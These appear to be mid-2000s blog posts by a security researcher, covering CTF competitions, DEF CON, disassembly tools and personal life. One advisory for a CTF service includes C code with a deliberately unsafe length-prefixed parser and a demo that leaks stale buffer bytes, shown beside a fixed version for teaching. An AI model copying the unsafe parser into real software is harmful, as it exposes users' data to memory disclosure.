We chilled until they closed down and the Idylwood became the Kenshotowood, as we were the only ones left. We partied until it was seriously too late... playing Pirates Dice (aka Liar's Dice), drinking port, and realizing the pirates within... (for the record, I'm still more ninja than pirate, but at 2am who really cares?).
Great time guys. Many thanks for the invite, the *outstanding Filet*, and excellent camaraderie.
Hey all,
I have been working on ImmunitySec's libdisassemble along with Matt Carpenter of Intelguardians. After Matt and I modified a significant portion of lesser-used opcode-processing and addressing methods - like good little open-source folk sharing the updates with the upstream owners - ImmunitySec decided to release the updated libdisassemble as v2.0, and asked us to do the press release. Matt being a somewhat quieter one among us (yes, I realize what that says about me) I decided to announce the release here. He said something about writing something up as well, but I'm not holding my breath (seems the job keeps him pretty busy these days).
PUBLIC RELEASE ANNOUNCEMENT
ImmunitySec and friends have released version 2.0 of LIBDISASSEMBLE, a 100% Python opcode disassembly library for x86 processors.
Disassembly routines are essential parts of debuggers, disassemblers and a variety of other reverse engineering tools. libdisassemble fills the need for the many security-related products and projects which are being developed using the Python language. Since libdisassemble is 100% Python, the code remains fairly easy to read and interface with, it is self-documenting using Python's built-in tool Pydoc, and maintains relatively high speed. It's not C, but it's not C either.
This version aims to provide a complete disassembly of the IA32 instruction set. Future versions will include the addition of the IA64/32 instruction set.
ImmunitySec is a software security and consulting company. They provide enterprise application assessments, customized training, and security software solutions such as CANVAS, SPIKE, SPIKE Proxy.
Intelguardians Network Intelligence LLC is a vendor independent Information Security Consultancy based in Washington D.C. Our experts lead the industry in security auditing, penetration testing, forensics, Incident Response and Architecture Review.
Intelguardians offers complete security solutions for the global market. Whether you are a CIO or Director of Security, a government agency, or a corporation needing Assessment, Response, or Mitigation Services, our team of Intelguardians stands ready to serve.
Capture the Flag Qualifiers have just completed, and what a weekend.
Basically, a bunch of haxx0rs-turned-zombies by no sleep and too much coffee.
As usual, Kenshoto put on an outstanding game-show. Modelled after the modern gameshow giant "Jeopardy", there were five categories each with five challenges, ranging in difficulty from "my secretary could answer that" to "HOLY CRAP MAKE IT STOP! IT HURTS!" (rev500 anyone?)
1@stplace was not required to compete since we won last year's CTF event. So we showed up under a different name. All that free experience and fun going to waste! I think not! Some argue that last year's quals were more fun than CTF itself! Besides, quals are a great way to really mold a team together. And by 5pm on Sunday, patience and teamwork are vital. "Hey! WOULD SOMEBODY STOP KILLING MY GDB SESSION!" oh wait, that was me. Perhaps I needed a little more patience (sorry guys). My team did excellent work and the competing teams in the quals showed some serious talent! The game even drew in some hackers so "leet" that they don't want to be known (notice two teams "stepped down"? ok, maybe one team stepped down because of their name...). This year's CTF is guaranteed to be a real struggle.
Final scores can be viewed at the kenshoto web site (minus ours, of course).
1@stplace is considering putting together a walk-through like we did last year.
Sorry for such a lame two-month update, but here it is.
------------------------------------------------------
Hello,
Congratulations! DEFCON is pleased to accept you as a speaker at DEFCON
15. You are one of the first to be accepted, so please bear in mind the
website is not fully updated yet. I will be communicating with you often
to remind you of deadlines and to give you updates. If you have any
questions please don't hesitate to ask.
Please keep an eye out within the next few weeks. I will try to send you
an "updated" Acceptance letter when the official speaker selections are
announced. In the meantime you may find your talk, abstract and bio
online at: http://www.defcon.org/html/defcon-15/dc-15-speakers.html. If
it is not online now, it should be up within the next few days.
Please be sure to monitor your email for requests, periodic updates and
reminders. Once again congrats, If you need anything, don't hesitate to
ask. I look forward to meeting you in Vegas again this year!
This is labelled shmoolet because it's a little blog about shmoo.
Shmoo was great this year, and it had largely to do with seeing you all again. It was great to reconnect with friends I only see once or twice a year.
Hilites of the con:
* ASI put up a "hackit" challenge, a bunch of puzzles which reminded me of a few areas I'm rusty or downright bad at. Good exercises. The ASI guys themselves were pretty awesome too. Great job guys.
* H1kari and friends showing that the cryptography numbers game has shifted in favor of the attackers. Crypto has always been a numbers game. How long do you need the information to be safe? 100,000,000 years? Fine, here's your crypto algorithm. Unfortunately (fortunately for some?) use of FPGAs has proven to yield roughly 1000 times the processing speed of modern x86 hardware. Time to recalculate our crypto safety...
* Raven with the gratuitous name-drop of GPF (General Purpose Fuzzer), written by my friend JROD
* Raven and j0hnny long being verbally (and physically?) accosted (WTF is that about!?)
* atlas and his mild mannered alter ego having some identity crisis
* SHMOOBALL FIGHT! Closing Ceremonies has never been so fun ;)
* kurios nearly ripping someone's arm out of its socket clamoring for Keith Myers' CD.
* Renderman and sharing of Shmoo-tables (choops render)
* Kevin Mitnick hogging Renderman's Shmoo-tables. Shame on you :)
* Keith Myers rockin' the third story of some cattle-herd bar (ie. we couldn't really move unless the guy (or hopefully girl) next to you moved). Made dancing interesting. Almost a sort of line-dancing orgy. I just drank and watched.
* Jay Beale and Sharky cuttin' a rug.
* Window
* Jay Beale and his "posse" at 2:30am
* Intelguardians and the magical blue
* H1kari's less-crowded party (thanks for the breathing room!)
* G Mark and hacking at 50. Great talk. Great guy. Great insight.
* Bio-warfare with certain individuals' sickness.... ew...
Take care all. Hopefully see you all again at defcon.
disass v3.0
disass v3.0 is staged and currently in alpha status. It disassembles using a modular infrastructure, allowing for different disassembly libraries (currently using py/libdasm), and virtually any type of binary executable format. Currently, deep support of ELF binaries is included, and basically reuses a lot of concepts from disass v2.3. A PE parser has just been completed, but is still considered alpha-level. A Mach-O file parser is scheduled in the near future, as are plugins for other disassembly libraries, namely Immunity's libdisassemble.
Many other vuln-finding additions are on the drawing-board.
One of the biggest differences from the 2.x versions is that objdump is no longer used. disass v3.0 is basically a complete rewrite, leveraging things learned from v1.x and 2.x. Both previous versions relied completely on textual output from objdump's disassembler; disass v3.0 deals with opcodes, not lines of text. This is proving to be very powerful. It is also proving to be a new learning experience, as memory usage and processing have to be balanced. Currently, disass v3.0 is every bit as fast as v2.3, with much more power. Better leverage of OOP allows for better tracking of jmps and calls, and now the addition of Memory Reference tracking. More complex applications build structures of functions, and rather than calling the address directly, the function address is loaded from memory into a register and called from the structure. This is particularly true of event-handling code. Subs will now indicate if an address has been referenced in another sub. While this doesn't tie the caller to the sub, it should provide some grounding and ties to the data structure which will later be used to call the sub.
Have fun all
@
... and no longer subcontracting code to anyone named "Smeagol" or "Gollum". First of all, this guy has some *seeeeerious* personal issues (namely, continually trying to strangle me then retreating with a meager "Smeagol is sorry, Master"), but worse yet is this guy's code!
/home/atlas/hacksans504
Traceback (most recent call last):
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 75, in ?
from disass3 import *
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 538, in ?
me = disass('/bin/bash')
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 114, in __init__
self.init()
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 122, in init
self.memory = VirtualMemory(self.EXE)
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 312, in __init__
self.init()
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 317, in init
self.parse(sec.getBytes(), sec.VMAstart)
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 335, in parse
self.SUBSs[startaddress+offet] = sub
AttributeError: VirtualMemory instance has no attribute 'SUBSs'
WTF is "SUBSs"? Totally over the line. It's bad enough to deal with constant spluttering of his SSSSSSsssssss-riddled vernacular, but Python says he goes... so he goes. Sayonara Smeagol.
(yes, the whole post is a humorous take-off on my own typos... and yes, this means that disass3 is on its way)
@
ps. Watch for me at defcon 15. I'm submitting two talks (one of them a joint effort with drb) so hopefully someone will fall for my deception and think I know something.
I'm sittin' in my favorite coffeeshop, the morningstar76, soaking up all the smoke and other nasal inhalants, and thinking about how life is good. I have many things to type and little time to type them, so buckle your safety-belt we're headin' for ludicrous speed.
vtrace/vdb
One of the reasons I'm in a fairly good mood this fine evening is because of some fun I've been having with some new tools from Invisigoth. If you should be reading this entry you should know who Invisigoth is; for those of you still clueless, he's just about the 'leetest d00d I know (and I know some pretty amazing folk). Called "vdb" and "vtrace", Visi's new toys are comprised of a nearly full-Python debugger and debugging interface respectively. No, the "v" does not mean "visi", but one of the few names that could be better... "vulnerability". Visi wrote a nearly platform-independent debugging interface specifically for the purpose of finding and exploiting vulns. Yes, I know that all debuggers can be used to find vulns.... but how many of them have been written with that express intent?
vdb is a decent front-end for vtrace. It looks really sweet. (bugs cost extra... so don't complain) To be honest, I've not used it much, having been much more happy about vtrace.
vtrace is the programmatic debugging interface for Python. This means that some of the most fun schtuff you can do is now available in the best language available. I'm just getting the hang of programmatic debugging, having longed for such ever since teaching myself how to use GDB. No knocks on GDB, but it's kinda like having to learn a new language.... Why not just use Python? I say that vtrace is "nearly" platform independent. What that means is that Visi has written it to work on Linux, Windows, Mac, BSD, and Solaris. W0W, eh? On POSIX environments he wraps the native ptrace (and you can see a lot of ptrace-like thinking in the architecture). On Windows, he hooks dbghelp.dll and psapi. So whether you're hacking Windows or Linux, you can use the same interface. SWEET!
I like to use Python interactively. It's one of the best ways to be powerful from a commandline, even surpassing the power of BASH (yes, BASH is powerful... just ask psifertex about bruting crypto in BASH - the freak!). With python/vtrace, I can figure out what I'm thinking, then back up, and copy it all into a script and make it pretty (cmdline args, subs, etc..)
Programmatic debugging, however, is quite a trip. I'm just getting into it, but having my python objects handle breakpoints and notifications is pretty rockin. Visi told me at the start "think about what you want to do before you start..." Well, that's been tough until now because I haven't understood what I *can* do. But between tinkering, and playing with the example code he includes (thanks visi!) I'm getting the hang of it. Furthermore, since it's Python and he's released the .py files, I am able to understand the magic happening underneath (because I want to). Well done, my friend. Get vtrace and vdb here.
job update
Y'all already know that I changed jobs about four months ago. The job is great. The travel is good, but not overwhelming. The folken are *exceptional*, allowing me to work beside some great names. I'm getting to hack at many different levels (and I mean MANY). Some of the work is using tools like Disass, vtrace, and IDA. Other work has used SysInternals Winders surface tools. Still other work has involved consulting about security architecture and pen testing (using other folkens sploits... ew... ;)
teaching
Many of you know that I've done some teaching for SANS in the past. Well, I get to teach the Hacker Techniques course again in a couple months. I'm looking forward to that. Ed Skoudis has always maintained a great course, and they've added to the bene's yet again! This past revision of the course has included more, earlier hands-on (thanks to a lot of feedback!) and day three (Exploitation Day 1) even includes some hands-on Buffer Overflow and Format String Exception stuff! SWEET! Well done, Ed. Students don't need to be 'leet to understand it, which is the beauty and elegance of it all. oh, and I submitted a Metasploit 3.0 module to exploit his hands-on binary :) There's a chance it'll find its way into the curriculum...
toplap
The end of November witnessed the passing of a very dear friend, affectionately known as Lady Arwen. Yes, my friends... Lady Arwen met her d00m much the way of the D0d0... kersplat into the ground. Arwen was a 2.8GHz/1GB/100GB/15.1" Dell Inspiron 1150 from about two years ago. And a wonderful laptop she has been. It was with great sadness that I had to put her to rest. She flew off the roof of the family van at about 50mph and took on dirt attempting to skip across a corn field between church and home. Only survivor (oddly enough) was the hard drive!
I first replaced her with a used Dell Latitude C640... nice machine, but PCMCIA was bad... and that was vital. I replaced that (after taking it back for a full refund) with an AMAZING machine with an ugly name. I was hit by a SHPAM (That's nearly-solicited email) about refurbed Toshiba QOSMIOs for a great deal. If you're not familiar with the QOSMIO, Wow, it's awesome. 17.1" wide-aspect entertainment screen, TV-tuner, Remote, non-laptop sound, a built-in mediaplayer (ie. no OS boot required), and a short battery life. New batteries for me have to last at least 3.5-4 hours. At 1.5 hours it was unacceptable. After attempted fraud from an ebay auction, I found that my parents needed an upgrade and an entertainment center for the motorhouse. Nice.
Finally, I believe I've found my new mate. Since my wife already labels my computers "the other woman" I have to pick wisely, no? Just after Christmas I found an HP Pavilion DV6000t. "DV" means "entertainment center", although I opted out of the TV tuner and remote control. I need this for hacking, right? I don't have time for TV! Especially when I should be reversing. (I have a tower for recording shows - MythTV rox). The new machine is a 15.4" screen (nicer to my fellow plane-mates), CoreDuo/1.733/80GB/512MB. So it has a bubble-butt... who cares. I bought the 12-cell battery, and you can make fun of it all you want. I'm getting 4+ hours on a Dual-core machine... I love the screen and everything. Kubuntu seems to like it too. :)
cable/biz internet
I'm not sure all of you know this, but getting broadband to my home was no small feat. After being rejected by AT&T for the T1 line I ordered, I went searching for a candidate to get broadband in my area then wifi-bridge it back to my home. I pay, they play. While searching, I called Charter cable. Known for its headaches and infected machines, I was just trolling for somebody close enough to get me within 5-10 miles for the bridge. I supposed the sales guy a fool when he said they might be able to get directly to me... but I humored him. DSL and Cable companies typically have responded with "You live WHERE?" whenever I've sought broadband in the past. Sure enough, the surveyor said "no dice" when he came out pre-install. To my great surprise, the cable main line ran right across the nearest road to me, but my private drive was too long for them to consider it. I asked him how much money "no dice" meant (I was desperate, and shocked at the new possibilities). He quoted me a rough estimate of $4k to install. Ouch. The actual estimate was just over $3800. Ouch... With a wrenching in my gut I told him to put in the order. He went to bat for me. Awesome guy... He came back with possible technical difficulties about power and signal.... I was nervous when he called back the next day. He called to tell me that the power wasn't a problem, and that his boss authorized some cost cuts, taking my costs down to about $3k-ish. When I asked if that was the best we could do, he suggested I run the line myself. The install would finish faster, cheaper, and be more reliable since I would trench and they would be hanging on power poles... which requires all sorts of permits, etc... Done. The next week I rented a trencher, had my heart-attack-recovering dad out to help, and we ran roughly 1300ft of underground cable. The installer was awesome as well. When he heard my story, and my costs, he did the install himself, at no additional cost to me... they normally contract out the work and charge the customer. SWEET!
The only bad part about Charter is their abysmal residential support, and the fact that they block ports inbound and outbound. Solution: pay extra for business Internet. Their business support is great (I got a guy out of MN who told me all about the infrastructure in my area, what routers and locations we hop through to get on the SONET, etc...) and I now have a static IP. Their offerings are still not great (I'm on 3M/1M for under $100/mo) but it's better than ISDN :)
refugees
The final temporal craziness in my world lately (aside from kids and stuff), my wife took on the responsibility for a refugee family. The local church owns the project, but my wife is the buck-stopper. This family is from Rwanda, and it's been awesome, and draining. Basically the project consists of paying some of the monetary costs, helping them get registered for health-stuff, social security, temporary assistance, ESL (English as a Second Language), helping them with housing, furnishing, and job-hunting. There are several "Coordinators" which are responsible for certain areas of the project, but it's all my wife's responsibility. I'm really proud of her, since she's normally crazy-averse. It's been plenty of that. :)
Typically, refugees are self-sufficient within 4-6 months (HOLY TEMPORAL LOBE BATMAN!). They're hard-working, and understand that it takes work to survive. I hope they can teach some Americans that while they're here. The family is great. The dad speaks Rwandan and French. I speak Spanish, so learning French was mind-bending as a crash course, but started to make a bit of sense after a week. They stayed with my family for the first week since they flew in just before Christmas... We didn't want them getting lost in the holiday shuffle.
Anyway, that's much of life lately. Sorry it's been so long. My two loyal fans will appreciate the update. The rest have probably already dropped my RSS feed... Here's to the two of you. ;)
OH! I have been busily working on Disass-2.3 and 3.0 (yes, I know, you haven't seen 2.1 or 2.2) and the @UtilityBelt has been getting some attention. Hopefully you'll see some of the vtrace fun in the next release. Disass-3.0 should have a new python-based disassembler so objdump should no longer be necessary. Lots of other work going on. But those are the highlights.
Hey all,
I know it's been a while since I last wrote, and things have been going crazy! I've been undergoing a job-change, going crazy with the kids and family, going camping, etc... so let's get down to business.
9/11
So 9/11/06 has come and gone, and limited damage reported. Gotta love the idiotic terrorists who attacked the American embassy in Syria. Four dead, including three of the terrorists! Nice numbers. Let's hope all terrorists can keep up with them. 'nuf sed.
Outage
I've been informed by Kurios that this site will have to undergo an outage in the near future of unknown duration. We are switching arrangements, and he can't guarantee me when the site will be live again. Sorry :(
DCG616
The first meeting of the 616 defcon group officially took place! JRod presented his defcon presentation on Fuzzing (which was great because I was too wrapped up in ctf to catch it). Here's a picture (taken in the plush office space of NFF):
From left to right: Myself, NFF, SRE, Birdman, and JRod
It was awesome, we laughed, we cried, we peed off the roof. It was quite a time :)
I also received a great deal of positive feedback to my defcon talk, The Making of atlas. Thank you! Your feedback is very much appreciated. Things like "Here the clock is striking 0430 and I maintain a feeling of exuberant success.... In this week I've drilled through material that I used to shy away from and I'm sure hearing your talk had something to do with it." and "For the last four years I have yet to meet someone that could inspired as you were a inspiration for me at the end of your speech."
Wow. My humblest thanks. I have likely received much *more* attention for leading the winning CTF team... but these choice morsels of appreciation are the quality which cannot be compared. You, my friends, have understood the talk. It wasn't so much about in-depth teaching... but hoping to encourage others to take the chance and enjoy the process of growing beyond your perceived potential. Thank you. A thousand times, thank you.
On a separate note, I have a friend who is searching for something he will not let himself find... purpose. In his latest lament, he mentioned other people doing GREAT things and worrying that soon it will be too late to start and become great. First off, Mr. Friend, vocational greatness compares little with true greatness. I've known "common" janitors, construction and factory workers who are great.... and celebrities who were not. Look at Hollywood and you'll see a great number of celebrities who are not great. I'm reminded of a song by Barlow Girl. "I wanna be a star, but is that all I'm really here for? And if I'm not a star will it be ok? will I still be someone?" Hang in there. Life has many purposes.
The true impact of a life is not measured by the far away spectators, but by the people you touch. You've chosen not to have kids until this point. Not that they immediately "fulfill your life cravings" but they do give many opportunities to be great... or fail.
There is one great investment left in the world. Many will tell you it is real estate... but it is in other people. Caring for other people. You would bluntly label it "altruism". I would call it loving your "neighbor" as yourself. These are different. The former does not include the "love yourself" thing.
It's a long road, with many subtleties along the way. It is often your life and the way you live it which create value you will not immediately see. Surround yourself with a few good, kind, respectable friends of character. Let their company cheer you and their advice take hold. I believe this world was created primarily for our enjoyment and tending. Do some of both.
Thanks to psifertex (of 1@stplace fame) for hosting the slides from my defcon talk. The main r4780y site doesn't have as much bandwidth so they'll be hosted here. He's also kindly hosting the @UtilityBelt and the Possibly Braindead Tips to Deadlisting.
Yes, my friends, we've done it. The world is now officially upside down. 1@stplace took First place at the recent Defcon Capture the Flag!
Wow. Too much to deal with right now... and I haven't slept since then (back to work already)...
Major choops go out to my team.
drb for his automagic, quick sploit writing, and helping me keep the balls in the air
wrffr for his binary leetness and c64 multidimensional mindwarping sploit
apu for his flexibility (and McD's!), working both defense as well as bringing his understanding of exploits to the sniffer when it went active
psifertex for his defense-fu... and how he was able to play offense too
plato for scavenging keys like a madman, and even manually piecing keys together for one sploit
unfortunately, shiruken was unable to join us, and we felt the lack. We did temporarily conscript two guys who deserve honorable mention:
john, who not only helped with defense, but really livened up the party
brian, who helped out on defense when psifertex had to leave early (and brought me coffee!)
beyond these great things, these folks all shared in several key traits which made a serious impact on the game, as well as the outcome.
They were indeed a team. The people which embody the huge intelligence are choice people. They were all patient, eager, and ready for each task. They were all self-starting and driven. They worked well "with little supervision" and were simply a pleasure as teammates.
Many choops to them.
Thanks go out to the many folks who gave us support. Your words (and beer!) did not go unremembered. Thank you.
Greetz to the fellow teams, each of which holds my respect. I particularly want to mention Skewlmaster, Giovanni, fednaught, the blueballs team...er.. "Our wives are pissed", the ad hoc team (who came to the con not expecting to do ctf!)
MAJOR CHOOPS to the Far East team, who came all the way from South Korea! Very glad they could come!
wow. What a weekend. It was also great to see good old friends and make some interesting new ones!
Well, I said that it would be released "tonight" and though technically it's "tomorrow" I haven't slept so it still counts.
CTF seems to be going fairly well for our team so far. Unfortunately, tomorrow will change the landscape in a *huge* way. We are up against some of the best hackers in the free world, including those from the Navy, UC, and even Korea!
Here is the @Utility Belt. Hopefully it will help you as it has me. Hopefully it will inspire you to build your own toolkit as your skillz grow. Feel free to use as much of mine as you like.
My most recent addition is quite exciting for me, it's nc.py (yes, that's NetCat in Python). It brings to Unix the ability to "Listen Harder" (previously only a Windows feature), and adds RAW socket support! It's not completely a rewrite of netcat, as there are a few finer details not implemented yet... It is not completely tested, and the error messages are the plain jane Python messages. BUT, I was able to use it today during ctf because the Solaris boxes we're defending don't have nc installed... and binary installation was proving difficult at the time. So I copied it up there and only had to change the location of the python binary. Excellent. I wired up a nc.py forwarder to bounce through our server to access something else. It made my day that much better!
en/un64 as well as the other converters are just plain helpful when you need to convert hex/base64/binary to and from ascii.
disass has probably had the most devoted work to it... and it is the most helpful to me at this time.
All this is released under GPL2.0. I simply ask that you let your curiosity and determination wander and conquer... and that you tell me about it :)
(To the tune of "Where the Streets Have No Name" by U2)
You might want to run, You might want to hide
I'm gonna tear down the walls that hold me inside.
I'm gonna reach out, and land a NOP sled where the code has no name.
I'm gonna point EIP anyplace.
I've seen the dust cloud disappear and seen your disgrace
There ain't no shelter from the poison rain where the code has no name.
Where the code has no name. Where the code has no name. I been building a code library
And when I take over, I'll pwn all of you... All I can do.
Buffers o'erflow and our love turns to rust.
Your reputation is dead and trampled in dust
I'll laugh in your face, flyin' high in cyberspace
Where the code has no name
Where the code has no name. Where the code has no name. I been building a code library
And when I take over, I'll pwn all of you... All I can do.
Description:
------------
fucktcpd is a not quite popular checksumming form of echo. The key feature of fucktcpd is that it does not use TCP or UDP, but rather the CHAOS/IP protocol.
Vulnerability:
--------------
fucktcpd uses a simple protocol. It expects a string of data using protocol 16 (CHAOS). The third byte of the packet payload indicates the size of the data being handed in. Because the buffer used is 0x1000 in size, and a single-byte size variable can only indicate up to 256 bytes, no buffer is overflowed. The resulting heap allocation and memory copying adhere to acceptable bounds checking, at least with regard to buffer overflows.
However, the size byte is not validated against the amount of data actually received, resulting in possible information disclosure.
For example, if a packet is handed in that contains only the first three bytes of payload but provides a size byte of 0xff (255), memory beyond the data actually received is accessed, copied, checksummed, and sent back to the attacker. If sensitive data was previously sent to the fucktcpd service, this information may be sent to an attacker.
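The bug described above is a length-validation gap, not an overflow: the destination buffer is big enough, but the declared size is never compared with the number of bytes that actually arrived, so the copy reaches stale bytes left in the receive buffer by earlier messages. The following C is an added illustration written for this write-up, not fucktcpd's own source (which is not on this page). It assumes a three-byte header with the size byte at index 2, a reused 0x1000-byte receive buffer, and made-up function names; the "earlier-client-secret" payload is constructed for the demo. The unsafe parser and the hardened parser differ by a single check.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define RECV_BUF_SIZE 0x1000   /* receive buffer size from the advisory */
#define HDR_LEN 3              /* assumption: two leading bytes, then the size byte */

/* Vulnerable shape (assumed, not fucktcpd's code): the destination is
 * bounds-checked, so nothing overflows, but the declared size is never
 * compared with 'received', the byte count that actually came off the wire.
 * Returns the number of bytes copied, or -1 if the packet is rejected. */
int parse_chaos_unsafe(const uint8_t *recvbuf, size_t received,
                       uint8_t *out, size_t outcap)
{
    if (received < HDR_LEN)
        return -1;
    size_t len = recvbuf[2];
    if (len > outcap)                      /* only the destination is checked */
        return -1;
    memcpy(out, recvbuf + HDR_LEN, len);   /* may copy stale bytes past 'received' */
    return (int)len;
}

/* Hardened shape: the declared size must also fit within the bytes received. */
int parse_chaos_safe(const uint8_t *recvbuf, size_t received,
                     uint8_t *out, size_t outcap)
{
    if (received < HDR_LEN)
        return -1;
    size_t len = recvbuf[2];
    if (len > outcap)
        return -1;
    if (len > received - HDR_LEN)          /* declared length exceeds what is on the wire */
        return -1;
    memcpy(out, recvbuf + HDR_LEN, len);
    return (int)len;
}

/* Constructed scenario: an earlier, larger message left its payload in the
 * receive buffer; then a message of only HDR_LEN bytes arrives declaring
 * 0xff bytes of payload. Fills recvbuf and returns the bytes actually received. */
static const char EARLIER_PAYLOAD[] = "earlier-client-secret";   /* constructed */

static size_t stage_short_packet(uint8_t *recvbuf)
{
    memset(recvbuf, 0, RECV_BUF_SIZE);
    recvbuf[0] = 0x00;
    recvbuf[1] = 0x00;
    recvbuf[2] = (uint8_t)(sizeof EARLIER_PAYLOAD - 1);
    memcpy(recvbuf + HDR_LEN, EARLIER_PAYLOAD, sizeof EARLIER_PAYLOAD - 1);

    /* the short packet overwrites only the header; the stale payload stays put */
    const uint8_t short_pkt[HDR_LEN] = {0x00, 0x00, 0xff};
    memcpy(recvbuf, short_pkt, HDR_LEN);
    return HDR_LEN;
}

/* Runs the unsafe parser on the staged buffer; 'leak' receives the bytes the
 * service would go on to checksum and echo back. */
int demo_unsafe(uint8_t *leak, size_t leakcap)
{
    uint8_t recvbuf[RECV_BUF_SIZE];
    size_t received = stage_short_packet(recvbuf);
    return parse_chaos_unsafe(recvbuf, received, leak, leakcap);
}

/* Same staged buffer through the hardened parser: the packet is rejected. */
int demo_safe(uint8_t *out, size_t outcap)
{
    uint8_t recvbuf[RECV_BUF_SIZE];
    size_t received = stage_short_packet(recvbuf);
    return parse_chaos_safe(recvbuf, received, out, outcap);
}

int main(void)
{
    uint8_t out[256];
    int n = demo_unsafe(out, sizeof out);
    printf("unsafe parser copied %d bytes; leading stale bytes: %.21s\n",
           n, (const char *)out);
    printf("safe parser result: %d (packet rejected)\n", demo_safe(out, sizeof out));
    return 0;
}
```

The point to carry away for review of any length-prefixed protocol: a size field needs two bounds, one against the destination capacity and one against the bytes actually present in the source. The first prevents overflow; only the second prevents over-read of whatever the buffer held before.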
Credits:
--------
atlas for his bull-headed stupidity
invisigoth for the enjoyable exercize
1@stPlace for putting up with atlas' continual rantings and detailed walkthrough of fucktcpd
We have been talking with Sk3wlMaster from the Sk3wl0fR00t, who we deeply respect, and are fortunate enough to be on good terms with, and it seems my comparison of Pwnage500 times is a bit skewed. It appeared to take Sk3wl about 20 hours but in reality it took Sk3wlMaster about 8 hours. I mentioned that it took us 4 hours, but given a relocation lag (and food), it would have appeared to take us 6 hours. Still, drb and wrffr compared to Sk3wlMaster at those times is *really* impressive! Sk3wlMaster is one of the greatest bughunters I know.
My apologies to them for the misrepresentation. For those of you who think this may be minor, please consider the amount of respect required for these guys... and you'll figure out why I made this announcement, rather than simply fixing the numbers.
Wow! Talk about a crazy month!
A little over a month ago, I had to put the network appliance upgrade on hold. I made it to release candidate 0. Not a bad bit of work.
However, about a month ago I started heavily preparing to teach a class for SANS. Which one? Of course, Ed Skoudis' famous SANS 504: Hacker Techniques, Exploits, and Incident Handling. So, on June 5th I was on. The most difficult, most gruelling 6 days of back-to-back teaching I've ever done. Day one covers the foundations of handling security incidents. While probably the least sexy, one of the most valuable since very few are skilled at the art of incident handling. The next four days are spent detailing the cyberattack process, with popular examples at each step. We cover everything from Googlehacking to Rootkits, and of course three of my favorite toyz: Nmap, Netcat, and Metasploit Framework. Choops go out to Fyodor, Hobbit and the msf team for their contributions to my entertainment/addictions. On the sixth day the students are put through their paces in a capture-the-flag style hacker challenge. No, we don't make them write their own sploitz :) but they are forced to determine weak points, exploit them and think about how to leverage each completed goal to attain the next. It's very kewl.
It was thrilling and enjoyable to see my students catch on and get clued in on the battlefield that is cyber-attacks. The threats live on all sides, and they got that. When I explained BOF's I was surprised to see very few heads explode! Actually, most of them had a look of concern and understanding... w00t!
One of the most interesting things about the class was the involvement of law enforcement. I'm faced all the time with rumors and humor about how ill-equipped law enforcement is at dealing with cybercrime. While I'm still of that opinion based on limited resources, etc... I now have hope that the ones who get it, get it. I got to hang out with some of (probably all) the top minds in Michigan's cyber-cops. Most of them did a lot of forensics (whey cool) and they all had a good head on their shoulders... although I'm frightened about how they "obtain" new hardware for the department. :) Makes me not want to get arrested!
While the class was a success and definitely a high....
defcon quals hit (oops, I almost said "next").... the night of day 5. Friday night at 10pm we started the challenge that was defcon ctf quals. That meant that I had to actually sleep (I got at least 3 hours) and spend 10 hours away from my team while I taught day 6, etc.... It was murder, but I was able to stay focused on my class... h311 for me, anyway. My team continued wrockin the whole time. My head was so woosie from teaching all week that I really wasn't much help. We made it all the way through the challenges and got a near perfect score (my bad on that, sorry guys). We were one of only three teams that finished the game, answering all questions. My team then posted the summary of the challenge here
Wow, I'm blessed with an incredible team. That is my choops from quals. I got to walk away knowing that I hand selected that amazing team. Each of our team members contributed a substantial amount. Everything from building and providing virtual machine OS builds to google research, to team communications, to pickin' up McD's. Here are a couple highlights for me from quals:
* drb and wrffr nailing Potent Pwnables for 500 in four hours (our naval compatriots took about 20 hours)
* Watching (virtually) as drb hacks together code that enables ssldump to decrypt RSA/AES/HMAC tcp streams (Forensics 500)
* psifertex earns his name by brute force cracking a crypto algorithm from BASH! (Binary Leetness 400)
* After much bumbling, I got to finish off the game by nailing Leetness 500 by snagging some decrypted text out of process memory
The team seemed to "get" the whole teamwork thing. Each mate came to the table with everything they had, eager to make things happen... and they did.
Rock on, 1@stPlace.
atlas proves his doof again...
Well, as if there was any question.... I'm an idiot.
Last Wednesday I decided on the best price for airfare to defcon. An airline called Allegiant Air was around $120 each way from Lansing to Vegas. I bought tickets leaving July 27th and coming back the 30th... that would give me Thursday to get settled in, etc...
Bad news. Friday I figure out that dc14 is August 4-6.... I got those cheap tickets for the WRONG WEEKEND! I called the airline and was told that I'd have to spend an additional $200. $100 for price increase, $100 in "change fees". I asked for a supervisor and was told that they would have one call me.
Friday night, nothing
I called back on Saturday... same deal. They won't help me, and my request for a supervisor was met with the same promise.
Saturday night, nothing
Like a good father, I let Sunday come and go without calling.
Monday rolls around and I call again. This time I get a supervisor right off the bat. *Extremely* nice lady. Very understanding... Still, I pleaded for all I was worth... admitting my stupidity and throwing myself at her mercy (rightfully, I might add). She very nicely waived the fees. I still had to pay an additional $100 because the August weekend rates were higher... but it's the same price that intelligent people were paying :)
Enter the good news:
The email which indicated my error started out like this:
Congratulations! DEF CON is pleased to accept you as a speaker at DEF
CON 14.
CTF registration
You have been registered for this year's qualifications.
You will receive a follow-up e-mail with a URL, username and password to use during the quals.
Qualifications will begin on Friday, June 9th 10pm EST, and will end at 23:59:59 Sunday, June 11th.
Crap. That means I'll be teaching during half of Saturday... luckily I have an amazing team who will be able to deal without me. They'll probably have the thing done by the time I'm done teaching... :)
I'm honored to be leading a team with an immense amount of talent, to which I bring comparatively little. Watch for 1@stPlace during Quals that weekend, and at ctf the first week of August in Vegas. Def Con 14 is at the Riviera this year.
Check us there.
fucktcpd is kicking my 455
The venue:
MorningStar76 "coffeehouse and den of sin", the same place that put the jitter into the jitterblog.
Sitting, watching the many varied personas walking around, sitting, playing cards, chess, livejournalling, or just looking at me funny.
Smoke filling my lungs so much I wish I smoked. Certainly will be showering before hitting the sheets this eve... nothing new there. A curly-red-haired boy (yes, you read that right) "flitting" around... everyone being some version of more or less themselves... or the facet they put on when out with friends. Interesting to watch what people make of themselves when in various environments. I enjoy people-watching.
